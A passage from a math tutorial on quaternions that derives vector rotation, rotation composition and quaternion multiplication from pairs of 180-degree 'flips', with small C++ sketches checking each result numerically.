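    const double s = 0.7071067811865476; // sin(45 deg) = cos(45 deg)
    Vec3 a{ 1, 0, 0 };  // first flip axis, on the XY plane
    Vec3 b{ s, s, 0 };  // second flip axis, +45 deg from a
    Vec3 v{ 1, 2, 3 };

    Vec3 r = Flip(Flip(v, a), b);
    // Half angle 45 deg => +90 deg rotation along Z: (1,2,3) -> (-2,1,3).
    std::printf("(%g, %g, %g)\n", r.x, r.y, r.z);
    return 0;
}
----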
=== Quaternion and Flip

Now let’s recall the quaternion vector form stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\frac{θ}{2}] here.

Think about flips again. A flip along axis stem:[\vec{a}] is also a stem:[180^{\circ}] rotation along axis stem:[\vec{a}]. So this flip can be represented in quaternion terms as

[stem]
++++
q_a=(sin\frac{180^{\circ}}{2}\vec{a},cos\frac{180^{\circ}}{2})=(\vec{a},0)
++++

From now on we will use quaternions to represent flips. In fact, any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].

=== Flip Composition

Here we need to introduce the multiplication of general quaternions. Let stem:[q_1=(\vec{v_1},w_1)] and stem:[q_2=(\vec{v_2},w_2)]; then

[stem]
++++
{q_1}{q_2}=(\vec{v_1},w_1)(\vec{v_2},w_2)=(w_1\vec{v_2} + w_2\vec{v_1} + \vec{v_1}×\vec{v_2}, {w_1}{w_2}-\vec{v_1}·\vec{v_2})
++++

Note that here stem:[q_1] and stem:[q_2] are not necessarily unit quaternions, so even though I’m using the vector form, there’s no need to write stem:[sin\frac{θ}{2}] and stem:[cos\frac{θ}{2}] as we did for unit quaternions. It’s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interested in how it is derived, the quaternion https://en.wikipedia.org/wiki/Quaternion#Definition[Wiki page] has a very straightforward introduction.
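As a reference implementation of that definition, here is a componentwise expansion, again a minimal sketch with hypothetical names. The sanity check in `main` multiplies the flips along the X and Y axes, which should give stem:[(\vec{x}×\vec{y},-\vec{x}·\vec{y})=((0,0,1),0)], the flip along Z.

[source,cpp]
----
#include <cstdio>

struct Quat { float x, y, z, w; };

// Componentwise expansion of the general product
// (v1,w1)(v2,w2) = (w1*v2 + w2*v1 + v1 x v2, w1*w2 - v1.v2).
Quat Mul(const Quat& q1, const Quat& q2)
{
    return Quat{
        q1.w * q2.x + q2.w * q1.x + (q1.y * q2.z - q1.z * q2.y),
        q1.w * q2.y + q2.w * q1.y + (q1.z * q2.x - q1.x * q2.z),
        q1.w * q2.z + q2.w * q1.z + (q1.x * q2.y - q1.y * q2.x),
        q1.w * q2.w - (q1.x * q2.x + q1.y * q2.y + q1.z * q2.z)
    };
}

int main()
{
    Quat qx{ 1, 0, 0, 0 };  // flip along X
    Quat qy{ 0, 1, 0, 0 };  // flip along Y
    Quat q = Mul(qx, qy);   // expect (0, 0, 1, 0), the flip along Z
    std::printf("(%g, %g, %g, %g)\n", q.x, q.y, q.z, q.w);
    return 0;
}
----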
We are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. Let stem:[q_a=(\vec{a},0)] and stem:[q_b=(\vec{b},0)]; then

[stem]
++++
{q_a}{q_b}=(\vec{a},0)(\vec{b},0)=(\vec{a}×\vec{b},-\vec{a}·\vec{b})
++++

It follows naturally from the general form, and it is the only multiplication we will use in Part 1.

With flip multiplication defined, we can rewrite our flip composition rule once more:

*_Any 3D rotation stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\vec{a},0)] and stem:[q_b=(\vec{b},0)], such that_*
[stem]
++++
q=-{q_b}{q_a}
++++
*_where stem:[\vec{a}·\vec{v}=0], stem:[\vec{b}·\vec{v}=0] and the angle from stem:[\vec{a}] to stem:[\vec{b}] is stem:[<\vec{a},\vec{b}>=\frac{θ}{2}]._*

You might be wondering why it is not stem:[q={q_a}{q_b}] instead. We will show where the order and the negative sign come from in the proof.

stem:[\vec{a}·\vec{b}=cos<\vec{a},\vec{b}>\left|\vec{a}\right|\left|\vec{b}\right|=cos\frac{θ}{2}]. Since stem:[\vec{a}·\vec{v}=0], stem:[\vec{b}·\vec{v}=0] and stem:[\left|\vec{v}\right|=1], we have stem:[\vec{a}×\vec{b}=sin<\vec{a},\vec{b}>\left|\vec{a}\right|\left|\vec{b}\right|\vec{v}=sin\frac{θ}{2}\vec{v}].

If you are not sure about the direction of the cross product, see Figure 2.

[stem]
++++
\begin{align*}
q&=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})\\
&=(\vec{a}×\vec{b},\vec{a}·\vec{b})\\
&=-(-\vec{a}×\vec{b},-\vec{a}·\vec{b})\\
&=-(\vec{b}×\vec{a},-\vec{b}·\vec{a})\\
&=-{q_b}{q_a}
\end{align*}
++++

Here you can also clearly see why we are using stem:[sin\frac{θ}{2}] and stem:[cos\frac{θ}{2}] in quaternions.
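A quick numeric check of this rule, reusing the hypothetical `Quat` and `Mul` from the previous sketch (repeated here so the snippet stands alone): take the Figure 1 setup, stem:[\vec{a}] along X and stem:[\vec{b}] at stem:[+45^{\circ}] from it on the XY plane, and confirm that stem:[-{q_b}{q_a}] is the stem:[+90^{\circ}] rotation along stem:[\vec{Z}].

[source,cpp]
----
#include <cstdio>

struct Quat { float x, y, z, w; };

Quat Mul(const Quat& q1, const Quat& q2)  // same product as above
{
    return Quat{
        q1.w * q2.x + q2.w * q1.x + (q1.y * q2.z - q1.z * q2.y),
        q1.w * q2.y + q2.w * q1.y + (q1.z * q2.x - q1.x * q2.z),
        q1.w * q2.z + q2.w * q1.z + (q1.x * q2.y - q1.y * q2.x),
        q1.w * q2.w - (q1.x * q2.x + q1.y * q2.y + q1.z * q2.z)
    };
}

int main()
{
    const float s = 0.70710678f;  // sin(45 deg) = cos(45 deg)
    Quat qa{ 1, 0, 0, 0 };        // flip along a = X
    Quat qb{ s, s, 0, 0 };        // flip along b, +45 deg from a
    Quat q = Mul(qb, qa);         // (b x a, -b.a)
    // -qb*qa should be (sin(45 deg)*Z, cos(45 deg)) = (0, 0, 0.7071, 0.7071),
    // the quaternion of a +90 deg rotation along Z.
    std::printf("(%g, %g, %g, %g)\n", -q.x, -q.y, -q.z, -q.w);
    return 0;
}
----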
One thing I need to mention here is the negation of a quaternion. For stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})], we have

[stem]
++++
\begin{align*}
{-q}&=(-sin\frac{θ}{2}\vec{v},-cos\frac{θ}{2})\\
&=(-sin\frac{2π-θ}{2}\vec{v},cos\frac{2π-θ}{2})\\
&=(sin\frac{-(2π-θ)}{2}\vec{v},cos\frac{-(2π-θ)}{2})\\
\end{align*}
++++

(Recall that stem:[sinθ=sin(π-θ)] and stem:[-cosθ=cos(π-θ)], used at stem:[\frac{θ}{2}] in the second line, and that stem:[-sinθ=sin(-θ)] and stem:[cosθ=cos(-θ)], used in the third line.)

This shows that stem:[-q] is a rotation along axis stem:[\vec{v}] of angle stem:[-(2π-θ)], which is exactly the same rotation as stem:[q]. For example, if stem:[θ=90^{\circ}] then stem:[-(2π-θ)=-270^{\circ}]: rotating stem:[90^{\circ}] along axis stem:[\vec{v}] is the same as rotating stem:[270^{\circ}] in the opposite direction along the same axis stem:[\vec{v}].

The fact that stem:[q] and stem:[-q] represent the same rotation is usually called double cover. However, in our calculation I don’t want you to simply think of stem:[q] and stem:[-q] as the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.

The order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flip along stem:[\vec{a}] first and then stem:[\vec{b}]. In fact, all unit quaternion multiplications need to be “read” from right to left when we are thinking about the order in which the rotations are applied.

---
.Side Note
****
We can, however, get rid of the negative sign by choosing stem:[\vec{a}] and stem:[\vec{b}] differently.

_Any 3D rotation stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\vec{a},0)] and stem:[q_b=(\vec{b},0)], such that
stem:[q={q_b}{q_a}]
where stem:[\vec{a}·\vec{v}=0], stem:[\vec{b}·\vec{v}=0] and the angle from stem:[\vec{a}] to stem:[\vec{b}] is stem:[<\vec{a},\vec{b}>=\frac{θ}{2}-π]._

It becomes harder to visualize stem:[\vec{a}] and stem:[\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with the negative sign in this article.

****
---
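Before moving on, here is the double cover property in actual numbers, using the angle-axis read-back formula from the side note in the Quaternion Definition section. A minimal standalone sketch:

[source,cpp]
----
#include <cmath>
#include <cstdio>

int main()
{
    const float kPi = 3.14159265f;
    // q is the +90 deg rotation along Z: (0, 0, sin(45 deg), cos(45 deg)).
    // Negate all four components to get -q (the zero components stay zero).
    float x = 0.0f, y = 0.0f;
    float z = -std::sin(kPi * 0.25f);
    float w = -std::cos(kPi * 0.25f);

    // Read -q back as angle-axis: theta = 2*acos(w), v = (x,y,z)/sqrt(1-w^2).
    float theta = 2.0f * std::acos(w);
    float inv = 1.0f / std::sqrt(1.0f - w * w);
    // Prints theta = 270 deg and axis (0, 0, -1): a 270 deg rotation along
    // -Z, which is the same 3D rotation as +90 deg along +Z.
    std::printf("theta = %g deg, axis = (%g, %g, %g)\n",
                theta * 180.0f / kPi, x * inv, y * inv, z * inv);
    return 0;
}
----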
=== Flip Vector

Given a flip stem:[q_a=(\vec{a},0)] and a vector stem:[\vec{v}], we are ready to calculate the result of the flip, stem:[\vec{v'}].

.Figure 3
image::https://github.com/lxjk/lxjk.github.io/raw/master/images/quaternions/fig3.png[, 400,align="center"]

According to the flip definition, stem:[\vec{v}], stem:[\vec{a}] and stem:[\vec{v'}] are on the same plane, and the angles satisfy stem:[<\vec{v},\vec{a}>=<\vec{a},\vec{v'}>].

Treat stem:[\vec{v}] and stem:[\vec{v'}] as the axes of flips stem:[q_v=(\vec{v},0)] and stem:[q_v'=(\vec{v'},0)]. From our flip composition rule, flipping along axis stem:[\vec{v}] then stem:[\vec{a}] should give us the same rotation as flipping along axis stem:[\vec{a}] then stem:[\vec{v'}].

We can actually calculate the resulting rotation. Let stem:[<\vec{v},\vec{a}>=<\vec{a},\vec{v'}>=\frac{θ}{2}] and stem:[\vec{u}=\frac{\vec{v}×\vec{a}}{\left|\vec{v}×\vec{a}\right|}=\frac{\vec{a}×\vec{v'}}{\left|\vec{a}×\vec{v'}\right|}]. Then the resulting rotation is of angle stem:[θ] along axis stem:[\vec{u}].

[stem]
++++
\begin{align*}
q&=(sin\frac{θ}{2}\vec{u},cos\frac{θ}{2})\\
&=-{q_a}{q_v}\\
&=-{q_v'}{q_a}
\end{align*}
++++

This gives stem:[{q_v'}{q_a}={q_a}{q_v}].

(Here stem:[\left|\vec{v}×\vec{a}\right|=\left|\vec{a}×\vec{v'}\right|=sin\frac{θ}{2}]. If you are not sure what’s going on here, go back to “Flip Composition” and read the proof.)

Now we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\vec{0},1)].

stem:[I=(\vec{0},1)] is called the identity quaternion, and it means no rotation at all. You can think of it as stem:[I=(sin0\vec{v},cos0)], which means rotating stem:[0^{\circ}] along any axis stem:[\vec{v}]. We haven’t gone into quaternion multiplication or rotation composition, but it’s not hard to see that for any quaternion stem:[q], stem:[qI=Iq=q].

In the case of unit quaternions, the idea of the inverse quaternion is that if you apply a rotation and then apply its inverse, the result should be no rotation at all. The same holds if you apply the inverse rotation first and then the original one.

For any unit quaternion stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})], the inverse is stem:[q^{-1}=(-sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})]. You can understand this in two ways: either stem:[q^{-1}=(sin\frac{θ}{2}(-\vec{v}),cos\frac{θ}{2})] or stem:[q^{-1}=(sin\frac{-θ}{2}\vec{v},cos\frac{-θ}{2})]. That is, stem:[q^{-1}] is either a rotation of angle stem:[θ] along axis stem:[-\vec{v}], or a rotation of angle stem:[-θ] along axis stem:[\vec{v}]. Either way it cancels out the original rotation.

I will give a quick proof in the case of a flip; you can try extending it to a general unit quaternion. For stem:[q_a=(\vec{a},0)] and stem:[q_a^{-1}=(-\vec{a},0)], we have

[stem]
++++
{q_a}{q_a^{-1}}=(\vec{a}×-\vec{a},-(\vec{a}·-\vec{a}))=(\vec{0},1)
++++

(Make sure you understand the difference between stem:[q^{-1}] and stem:[-q]. Read about quaternion negation in “Flip Composition” if you are not sure.)

We can now go back to the flip vector result stem:[{q_v'}{q_a}={q_a}{q_v}]. Applying the inverse flip of stem:[q_a] on both sides, the equation becomes

[stem]
++++
\begin{align*}
{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\
q_v'&={q_a}{q_v}{q_a^{-1}}
\end{align*}
++++

This gives us a way to calculate the result of a flip. Since we only need the vector part of the result, we can denote this as

[stem]
++++
\vec{v'}={q_a}\vec{v}{q_a^{-1}}
++++

When we put a vector stem:[\vec{v}] into a quaternion multiplication, we are implicitly making that vector the axis of a flip in order to stuff it into a quaternion stem:[(\vec{v},0)]. This is where the “sandwich” multiplication form comes from, though so far only for flips. We will prove that the result holds for any rotation in the next section.

=== Rotate Vector

We know any 3D rotation stem:[q] can be broken down into 2 flips, stem:[q=-{q_b}{q_a}], which means flipping along stem:[\vec{a}] first and then stem:[\vec{b}]. So for a vector stem:[\vec{v}], we apply the first flip and get
[stem]
++++
\vec{v'}={q_a}\vec{v}{q_a^{-1}}
++++
Then we apply the second flip to stem:[\vec{v'}] and get
[stem]
++++
\vec{v''}={q_b}\vec{v'}{q_b^{-1}}
++++
So the final result is
[stem]
++++
\begin{align*}
\vec{v''}&={q_b}{q_a}\vec{v}{q_a^{-1}}{q_b^{-1}}\\
&=({q_b}{q_a})\vec{v}({q_b}{q_a})^{-1}\\
&=(-q)\vec{v}(-q^{-1})\\
&=q\vec{v}q^{-1}\\
\end{align*}
++++
Here you can see why stem:[q=-{q_b}{q_a}] needs to be in this order.

One thing we still need to prove is stem:[{q_a^{-1}}{q_b^{-1}}=({q_b}{q_a})^{-1}]:
[stem]
++++
\begin{align*}
{q_a^{-1}}{q_b^{-1}}&=(-\vec{a},0)(-\vec{b},0)\\
&=(-\vec{a}×-\vec{b},-(-\vec{a})·(-\vec{b}))\\
&=(\vec{a}×\vec{b},-\vec{a}·\vec{b})\\
&=(-(\vec{b}×\vec{a}),-\vec{b}·\vec{a})\\
&=({q_b}{q_a})^{-1}
\end{align*}
++++
At this point, we have fully explained how to rotate a vector using a quaternion.
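Putting the pieces together in code, a rotate-vector sketch looks like this (hypothetical names; `Mul` is the product from the Flip Composition section, repeated so the snippet compiles on its own):

[source,cpp]
----
#include <cstdio>

struct Vec3 { float x, y, z; };
struct Quat { float x, y, z, w; };

Quat Mul(const Quat& q1, const Quat& q2)  // same product as above
{
    return Quat{
        q1.w * q2.x + q2.w * q1.x + (q1.y * q2.z - q1.z * q2.y),
        q1.w * q2.y + q2.w * q1.y + (q1.z * q2.x - q1.x * q2.z),
        q1.w * q2.z + q2.w * q1.z + (q1.x * q2.y - q1.y * q2.x),
        q1.w * q2.w - (q1.x * q2.x + q1.y * q2.y + q1.z * q2.z)
    };
}

// Sandwich product v' = q * v * q^-1 for a unit quaternion q.
Vec3 Rotate(const Vec3& v, const Quat& q)
{
    Quat qv{ v.x, v.y, v.z, 0.0f };      // stuff v into a flip quaternion
    Quat inv{ -q.x, -q.y, -q.z, q.w };   // inverse of a unit quaternion
    Quat r = Mul(Mul(q, qv), inv);
    return Vec3{ r.x, r.y, r.z };        // only the vector part is needed
}

int main()
{
    const float s = 0.70710678f;
    Quat q{ 0, 0, s, s };                 // +90 deg along Z
    Vec3 v = Rotate(Vec3{ 1, 0, 0 }, q);  // expect (0, 1, 0)
    std::printf("(%g, %g, %g)\n", v.x, v.y, v.z);
    return 0;
}
----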
=== Rotation Composition

Given rotations stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate a vector stem:[\vec{v}] by stem:[q_1] first and then by stem:[q_2], we have
[stem]
++++
\begin{align*}
\vec{v'}&={q_1}\vec{v}{q_1^{-1}}\\
\vec{v''}&={q_2}\vec{v'}{q_2^{-1}}\\
&={q_2}{q_1}\vec{v}{q_1^{-1}}{q_2^{-1}}\\
&=({q_2}{q_1})\vec{v}({q_2}{q_1})^{-1}\\
\end{align*}
++++
It is the same as applying the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.

Again we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later. This equation is actually very easy to understand in geometric terms. We have a combined rotation stem:[q={q_2}{q_1}] that applies stem:[q_1] first and then stem:[q_2]. If we want to undo this rotation, which means applying the inverse stem:[q^{-1}=({q_2}{q_1})^{-1}], we need to undo stem:[q_2] first and then undo stem:[q_1]; that is effectively stem:[{q_1^{-1}}{q_2^{-1}}].

What does it really mean to combine 2 rotations? Can we visualize the rotation axis and angle of the result? By converting rotations to flips we can actually do that.

Let stem:[q_1=(sin\frac{θ_1}{2}\vec{v_1},cos\frac{θ_1}{2})] and stem:[q_2=(sin\frac{θ_2}{2}\vec{v_2},cos\frac{θ_2}{2})]. We need to choose a special flip breakdown, such that the two rotations share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}].

Can we find such a breakdown? Remember the rule of flip composition requires the flip axes to be perpendicular to the rotation axis, that is stem:[\vec{c}·\vec{v_1}=0] and stem:[\vec{c}·\vec{v_2}=0], so we can choose stem:[\vec{c}=\frac{\vec{v_1}×\vec{v_2}}{\left|\vec{v_1}×\vec{v_2}\right|}].

Based on stem:[\vec{c}] we can find the other two axes: rotating stem:[\vec{c}] along axis stem:[\vec{v_1}] by angle stem:[-\frac{θ_1}{2}] gives stem:[\vec{a}]; rotating stem:[\vec{c}] along axis stem:[\vec{v_2}] by angle stem:[\frac{θ_2}{2}] gives stem:[\vec{b}]. This process is demonstrated in Figure 4.

Now we have stem:[\vec{a}·\vec{v_1}=0], stem:[\vec{c}·\vec{v_1}=0], stem:[<\vec{a},\vec{c}>=\frac{θ_1}{2}] and stem:[\vec{c}·\vec{v_2}=0], stem:[\vec{b}·\vec{v_2}=0], stem:[<\vec{c},\vec{b}>=\frac{θ_2}{2}]. Our breakdown stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as
[stem]
++++
\begin{align*}
q&={q_2}{q_1}\\
&=(-{q_b}{q_c})(-{q_c}{q_a})\\
&={q_b}({q_c}{q_c}){q_a}\\
&=-{q_b}{q_a}\\
\end{align*}
++++
Here we used the fact that
[stem]
++++
{q_c}{q_c}=(\vec{c},0)(\vec{c},0)=(\vec{c}×\vec{c},-(\vec{c}·\vec{c}))=(\vec{0},-1)=-I
++++
This shows that the combined rotation can be composed of flips stem:[q_a] and stem:[q_b], which tells us the combined rotation is a rotation of angle stem:[2<\vec{a},\vec{b}>] along axis stem:[\vec{u}=\frac{\vec{a}×\vec{b}}{\left|\vec{a}×\vec{b}\right|}].

.Figure 4
image::https://github.com/lxjk/lxjk.github.io/raw/master/images/quaternions/fig4.png[, 400,align="center"]
In Figure 4, the blue plane is based on stem:[\vec{v_1}] and stem:[\vec{v_2}], and stem:[\vec{c}] is perpendicular to that plane. 
The orange plane is based on stem:[\vec{a}] and stem:[\vec{b}], and the resulting rotation axis stem:[\vec{u}] is perpendicular to that plane.

With the same method, let’s prove the thing we left out:
[stem]
++++
\begin{align*}
{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\
&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\
&=-{q_a^{-1}}{q_b^{-1}}\\
&=(-{q_b}{q_a})^{-1}\\
&=({q_b}{q_c}{q_c}{q_a})^{-1}\\
&=({q_2}{q_1})^{-1}\\
\end{align*}
++++
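The order sensitivity is easy to verify numerically. The snippet below assumes the same hypothetical `Vec3`, `Quat`, `Mul` and `Rotate` as in the previous sketches; it rotates a vector by stem:[90^{\circ}] along X and then stem:[90^{\circ}] along Y, once step by step and once through each combined product. Only stem:[{q_2}{q_1}] matches the step-by-step result.

[source,cpp]
----
#include <cstdio>
// Assumes Vec3, Quat, Mul and Rotate from the previous sketches.

int main()
{
    const float s = 0.70710678f; // sin(45 deg) = cos(45 deg)
    Quat q1{ s, 0, 0, s };       // +90 deg along X, applied first
    Quat q2{ 0, s, 0, s };       // +90 deg along Y, applied second

    Vec3 v{ 0, 0, 1 };
    Vec3 step = Rotate(Rotate(v, q1), q2);  // (0, -1, 0)
    Vec3 good = Rotate(v, Mul(q2, q1));     // (0, -1, 0), matches
    Vec3 bad  = Rotate(v, Mul(q1, q2));     // (1, 0, 0), wrong order
    std::printf("(%g,%g,%g) (%g,%g,%g) (%g,%g,%g)\n",
                step.x, step.y, step.z, good.x, good.y, good.z,
                bad.x, bad.y, bad.z);
    return 0;
}
----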
=== Summary of Part 1

In Part 1, we covered the definition of the quaternion stem:[q=(x,y,z,w)], the vector form of a quaternion stem:[q=(\vec{v},w)], the unit quaternion stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})], and how it is used to represent a rotation.

We also talked about the negation of a quaternion stem:[-q] and its double cover property, the inverse of a quaternion stem:[q^{-1}], and the identity quaternion stem:[I=(\vec{0},1)].

We used quaternions to represent flips stem:[q_a=(\vec{a},0)], and derived the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how a quaternion rotates a vector by stem:[\vec{v'}=q\vec{v}q^{-1}] and how rotations get composed by stem:[q={q_2}{q_1}].

We briefly touched on quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].

=== Appendix: Derive Quaternion Multiplication

This part is not very important for understanding quaternions. It is a bit calculation heavy and is more for fun. Feel free to skip it.

We can actually derive the general quaternion multiplication from the special flip breakdown above. That is, if we define the flip multiplication stem:[{q_a}{q_b}=(\vec{a},0)(\vec{b},0)=(\vec{a}×\vec{b},-\vec{a}·\vec{b})] directly, we can prove what the general quaternion multiplication stem:[{q_2}{q_1}=(sin\frac{θ_2}{2}\vec{v_2},cos\frac{θ_2}{2})(sin\frac{θ_1}{2}\vec{v_1},cos\frac{θ_1}{2})] would look like.

Here are some identities we will be using:
[stem]
++++
\begin{align*}
\vec{a}×(\vec{b}×\vec{c})&=(\vec{a}·\vec{c})\vec{b}-(\vec{a}·\vec{b})\vec{c}\\
(\vec{a}×\vec{b})·(\vec{c}×\vec{d})&=(\vec{a}·\vec{c})(\vec{b}·\vec{d})-(\vec{a}·\vec{d})(\vec{b}·\vec{c})\\
(\vec{a}×\vec{b})×(\vec{a}×\vec{c})&=(\vec{a}·(\vec{b}×\vec{c}))\vec{a}
\end{align*}
++++

Recall how we chose the flip breakdown: stem:[\vec{c}=\frac{\vec{v_1}×\vec{v_2}}{\left|\vec{v_1}×\vec{v_2}\right|}].

Rotating stem:[\vec{c}] along axis stem:[\vec{v_1}] by angle stem:[-\frac{θ_1}{2}] we get
[stem]
++++
\vec{a}=cos\frac{-θ_1}{2}\vec{c} + sin\frac{-θ_1}{2}(\vec{v_1}×\vec{c})=\frac{1}{\left|\vec{v_1}×\vec{v_2}\right|}(cos\frac{θ_1}{2}(\vec{v_1}×\vec{v_2}) - sin\frac{θ_1}{2}(\vec{v_1}×(\vec{v_1}×\vec{v_2})))
++++
Rotating stem:[\vec{c}] along axis stem:[\vec{v_2}] by angle stem:[\frac{θ_2}{2}] we get
[stem]
++++
\vec{b}=cos\frac{θ_2}{2}\vec{c} + sin\frac{θ_2}{2}(\vec{v_2}×\vec{c})=\frac{1}{\left|\vec{v_1}×\vec{v_2}\right|}(cos\frac{θ_2}{2}(\vec{v_1}×\vec{v_2}) + sin\frac{θ_2}{2}(\vec{v_2}×(\vec{v_1}×\vec{v_2})))
++++
Then we have
[stem]
++++
\begin{align*}
\vec{a}·\vec{b}&=\frac{1}{{\left|\vec{v_1}×\vec{v_2}\right|}^{2}}(cos\frac{θ_1}{2}cos\frac{θ_2}{2}{\left|\vec{v_1}×\vec{v_2}\right|}^{2} - sin\frac{θ_1}{2}sin\frac{θ_2}{2}((\vec{v_1}×(\vec{v_1}×\vec{v_2}))·(\vec{v_2}×(\vec{v_1}×\vec{v_2}))))\\
&=\frac{1}{{\left|\vec{v_1}×\vec{v_2}\right|}^{2}}(cos\frac{θ_1}{2}cos\frac{θ_2}{2}{\left|\vec{v_1}×\vec{v_2}\right|}^{2} - sin\frac{θ_1}{2}sin\frac{θ_2}{2}(\vec{v_1}·\vec{v_2}){\left|\vec{v_1}×\vec{v_2}\right|}^{2})\\
&=cos\frac{θ_1}{2}cos\frac{θ_2}{2} - sin\frac{θ_1}{2}sin\frac{θ_2}{2}(\vec{v_1}·\vec{v_2})
\end{align*}
++++
[stem]
++++
\begin{align*}
\vec{a}×\vec{b}&=\frac{1}{{\left|\vec{v_1}×\vec{v_2}\right|}^{2}}(cos\frac{θ_1}{2}sin\frac{θ_2}{2}((\vec{v_1}×\vec{v_2})×(\vec{v_2}×(\vec{v_1}×\vec{v_2})))\\
&- sin\frac{θ_1}{2}cos\frac{θ_2}{2}((\vec{v_1}×(\vec{v_1}×\vec{v_2}))×(\vec{v_1}×\vec{v_2}))\\
&- sin\frac{θ_1}{2}sin\frac{θ_2}{2}((\vec{v_1}×(\vec{v_1}×\vec{v_2}))×(\vec{v_2}×(\vec{v_1}×\vec{v_2}))))\\
&=\frac{1}{{\left|\vec{v_1}×\vec{v_2}\right|}^{2}}(cos\frac{θ_1}{2}sin\frac{θ_2}{2}{\left|\vec{v_1}×\vec{v_2}\right|}^{2}\vec{v_2} + sin\frac{θ_1}{2}cos\frac{θ_2}{2}{\left|\vec{v_1}×\vec{v_2}\right|}^{2}\vec{v_1} - sin\frac{θ_1}{2}sin\frac{θ_2}{2}{\left|\vec{v_1}×\vec{v_2}\right|}^{2}(\vec{v_1}×\vec{v_2}))\\
&=cos\frac{θ_1}{2}sin\frac{θ_2}{2}\vec{v_2} + sin\frac{θ_1}{2}cos\frac{θ_2}{2}\vec{v_1} - sin\frac{θ_1}{2}sin\frac{θ_2}{2}(\vec{v_1}×\vec{v_2})
\end{align*}
++++
From the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is
[stem]
++++
\begin{align*}
q&=(\vec{a}×\vec{b},\vec{a}·\vec{b})\\
&=(cos\frac{θ_1}{2}(sin\frac{θ_2}{2}\vec{v_2}) + cos\frac{θ_2}{2}(sin\frac{θ_1}{2}\vec{v_1}) - (sin\frac{θ_1}{2}\vec{v_1})×(sin\frac{θ_2}{2}\vec{v_2}), cos\frac{θ_1}{2}cos\frac{θ_2}{2} - (sin\frac{θ_1}{2}\vec{v_1})·(sin\frac{θ_2}{2}\vec{v_2}))
\end{align*}
++++
which is exactly the general quaternion multiplication formula applied to stem:[{q_2}{q_1}=(sin\frac{θ_2}{2}\vec{v_2},cos\frac{θ_2}{2})(sin\frac{θ_1}{2}\vec{v_1},cos\frac{θ_1}{2})].
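As a final cross-check of this derivation, the sketch below builds two arbitrary rotations, multiplies them with the componentwise `Mul` from earlier (repeated so the snippet stands alone), and compares against the closed form just derived. This is again a hypothetical sketch; the two printed quaternions should agree up to floating point error.

[source,cpp]
----
#include <cmath>
#include <cstdio>

struct Vec3 { double x, y, z; };
struct Quat { double x, y, z, w; };

Quat Mul(const Quat& q1, const Quat& q2)  // same product as above
{
    return Quat{
        q1.w * q2.x + q2.w * q1.x + (q1.y * q2.z - q1.z * q2.y),
        q1.w * q2.y + q2.w * q1.y + (q1.z * q2.x - q1.x * q2.z),
        q1.w * q2.z + q2.w * q1.z + (q1.x * q2.y - q1.y * q2.x),
        q1.w * q2.w - (q1.x * q2.x + q1.y * q2.y + q1.z * q2.z)
    };
}

int main()
{
    double t1 = 1.1, t2 = 0.7;              // two arbitrary angles
    Vec3 v1{ 1, 0, 0 }, v2{ 0, 0.6, 0.8 };  // two unit axes
    double s1 = std::sin(t1/2), c1 = std::cos(t1/2);
    double s2 = std::sin(t2/2), c2 = std::cos(t2/2);
    Quat q1{ s1*v1.x, s1*v1.y, s1*v1.z, c1 };
    Quat q2{ s2*v2.x, s2*v2.y, s2*v2.z, c2 };

    Quat m = Mul(q2, q1);                   // componentwise product

    // Closed form from the appendix: vector and scalar parts of q2*q1.
    Vec3 cross{ v1.y*v2.z - v1.z*v2.y, v1.z*v2.x - v1.x*v2.z,
                v1.x*v2.y - v1.y*v2.x };
    double dot = v1.x*v2.x + v1.y*v2.y + v1.z*v2.z;
    Quat f{ c1*s2*v2.x + s1*c2*v1.x - s1*s2*cross.x,
            c1*s2*v2.y + s1*c2*v1.y - s1*s2*cross.y,
            c1*s2*v2.z + s1*c2*v1.z - s1*s2*cross.z,
            c1*c2 - s1*s2*dot };

    std::printf("(%f, %f, %f, %f)\n(%f, %f, %f, %f)\n",
                m.x, m.y, m.z, m.w, f.x, f.y, f.z, f.w);
    return 0;
}
----

If the two printed lines agree, the flip-based derivation and the componentwise product are consistent.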
